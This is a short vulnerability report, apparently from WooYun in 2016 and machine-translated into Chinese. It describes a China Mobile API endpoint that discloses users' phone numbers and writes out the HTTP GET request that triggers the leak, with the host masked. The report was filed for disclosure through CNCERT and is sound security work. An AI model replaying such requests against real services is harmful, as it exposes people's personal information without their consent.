漏洞标题 使用中国移动的数据访问网络可能会导致个人信息的泄露,如手机号码 相关制造商 中国移动 漏洞作者 过路人 提交时间 2016-05-04 21: 10 公共时间 2016-06-20 17: 30 漏洞类型 敏感信息披露 危险等级 高 自我评估等级 20 漏洞状态 已提交给第三方合作机构(cncert National Internet Emergency Center) 标签标签 敏感信息披露 漏洞详细信息
使用邮递员构建以下信息,可以通过中国移动数据网获取中国移动账号的手机号码获取。 GET/migu/remoting/is_login_tag HTTP/1.1 主机: **。**。**。** 用户代理: Mozilla/5.0(Linux; U; Android 5.1.1; zh-CN; XT912 Build/LMY48W)AppleWebKit/534.30(KHTML,类似Gecko)版本/4.0 UCBrowser /**.**.**.* * U3/0.8.0 Mobile Safari/534.30 接受: application/json,text/js,*/*; Q=0.01 缓存控制:无缓存 漏洞证明: 手机号码信息可以通过中国移动wap站点的api(/migu/remoting/is_login_tag)输出(**。**。**。**) 修理计划: 建议关闭敏感信息的输出。 版权声明:请注明出处。居民A @乌云